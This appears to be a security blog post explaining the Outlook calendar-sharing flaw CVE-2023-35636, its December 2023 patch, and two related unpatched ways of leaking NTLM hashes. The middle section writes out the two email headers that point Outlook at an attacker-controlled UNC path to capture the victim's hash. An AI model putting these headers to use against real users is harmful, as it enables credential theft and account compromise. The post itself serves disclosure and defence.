Calendar invitation in Outlook can reveal password (via CVE-2023-35636)

[German]Small addendum to the December 2023 patchday, during which an information disclosure vulnerability (CVE-2023-35636) was also closed. It has now become known that even the acceptance of a calendar invitation by a user can reveal their password. While this vulnerability in Outlook has been patched, there are other methods to retrieve an NTLM hash, e.g. via a file manager. These vulnerabilities are not patched. Here is an overview of the issue.


Outlook 2016 Update KB5002529

I mentioned in the blog post Microsoft Office updates (December 12, 2023) that Microsoft has released the update KB5002529 for the MSI installation variants of Microsoft Office 2016. There, Microsoft wrote that this security update fixes a vulnerability in the disclosure of information in Microsoft Outlook. Under CVE-2023-35636 there was then further information on this vulnerability. Microsoft has also released a security update for the Click-2-Run versions of Outlook 2019, 2021 and 365. The vulnerability is listed as important and with a CVSS 3.1 of 6.5, although Microsoft considers exploitation to be "unlikely".

There, Microsoft states that an attacker could exploit this vulnerability via email by sending a specially crafted file to the user and causing them to open it. It also states that in a web-based attack scenario, an attacker could host a website (or use a compromised website that accepts or hosts user-supplied content) that contains a specially crafted file that exploits the vulnerability.

An attacker would have no way of forcing users to visit the website. Instead, the attacker would have to convince users to click on a link, usually through an enticement in an email or instant message, and then get them to open the specially crafted file. Exploitation of this vulnerability could allow the disclosure of NTLM hashes.

Calendar invitations are enough to leak

Now I came across the article Accepting a calendar invite in Outlook could leak your password by SC Media via the following tweet, which sheds some more light on the matter.

CVE-2023-35636 in Outlook


Dolev Taler from Varonis has disclosed details of the discovered vulnerability CVE-2023-35636 in the article Outlook Vulnerability Discovery and New Ways to Leak NTLM Hashes on January 18, 2023. Security researchers from Varonis Threat Labs had discovered the new vulnerability in Outlook and three new ways to access hashed NTLM v2 passwords by exploiting Outlook, Windows Performance Analyzer (WPA) and Windows File Explorer.

NTLM hash enables offline brute force attacks

With access to these passwords, attackers can attempt an offline brute force attack or an authentication relay attack to compromise an account and gain access. CVE-2023-35636 allows exploitation of the calendar sharing feature in Microsoft Outlook. Adding two headers to an email instructs Outlook to share the content and contact a specific machine. This provides an opportunity to intercept an NTLM v2 hash.

NTLM v2 is a cryptographic protocol used by Microsoft Windows to authenticate users to remote servers. Although NTLM v2 is a more secure version of the original NTLM, v2 is still vulnerable to offline brute force and authentication relay attacks.

As the default email and calendar tool for the Microsoft 365 suite, used by millions of people around the world for both work and personal purposes, Outlook is an attractive target for attackers. The post Microsoft hacked by Russian Midnight Blizzard; emails exfiltrated since Nov. 2023 is the best proof.

The Outlook attack vector

Outlook offers the possibility to share calendars between users. Varonis Threat Labs has now discovered that this function can be exploited to forward the hashed password. All it takes is to insert a few headers into an email to trigger an authentication attempt.

"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics

The first line tells Outlook that the email contains content to share. The second line directs Outlook to the attacker's computer in order to load an .ics invitation file from there. An attacker therefore only needs to send an email invitation to the victim in which the ".ICS" file path refers to the computer controlled by the attacker. By "listening" to a self-controlled path (domain, IP, folder path, UNC, etc.), the attacker can receive packets with connection attempts, with the hash included, and then attempt to access this resource.

When the victim clicks on the button to accept the calendar invitation in the message, their computer attempts to retrieve the .ics configuration file from the attacker's computer. However, the victim's NTLM hash is exposed during authentication.

Vulnerability in Outlook closed

It is therefore important to only use an Outlook version in which the vulnerability CVE-2023-35636 has been patched (Office 2013 has no longer received any updates). Microsoft has recognized the exploit for Outlook as "important" under CVE-2023-35636 and with a rating of 6.5. On December 12, 2023, a patch for CVE-2023-35636 was released for Outlook 2016, 2019, 2021 and Outlook 365. The vulnerability is therefore closed there.

Microsoft patches incompletely

IIn the article Outlook Vulnerability Discovery and New Ways to Leak NTLM Hashes, however, the two other methods for retrieving the NTLM hash via the Windows Performance Analyzer (WPA) and Windows File Explorer (WFE) are disclosed. Varonis notified Microsoft of the WPA vulnerability via the Microsoft Security Response Center on July 5, 2023 and of the Windows File Explorer vulnerability on July 30, 2023. However, Microsoft closed both tickets again due to their "medium severity".

These vulnerabilities have therefore probably not yet been patched. Dvir Sason, Security Research Manager at Varonis, confirmed this to SC Media: "These reported vulnerabilities have not been patched; that according to Microsoft, this behavior is not considered a vulnerability". However, Varonis security researchers consider the two vulnerabilities to be a basic legitimate attack vector. Unpatched systems are still susceptible to threat actors attempting to steal hashed passwords using these methods.

Cookies helps to fund this blog: Cookie settings

This entry was posted in Office, Security and tagged , . Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *